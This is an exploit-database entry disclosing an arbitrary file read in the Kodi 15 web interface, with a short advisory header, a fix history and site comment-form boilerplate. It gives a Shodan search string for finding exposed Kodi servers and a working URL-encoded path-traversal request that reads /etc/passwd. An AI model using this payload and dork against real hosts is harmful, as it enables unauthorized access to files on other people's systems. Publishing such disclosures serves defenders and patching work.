Kodi 15 Arbitrary File Access

2015.12.02

Credit: mpronk89

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: title:kodi

# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report:
http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a
kodi web interface vulnerable to arbitrary file read.
example:
<ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
for passwd
?(issue fixed in 2012, reintroduced in february 2015. Fixed again november
2015 for v16)

References:

http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Kodi 15 Arbitrary File Access

Dork: title:kodi

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.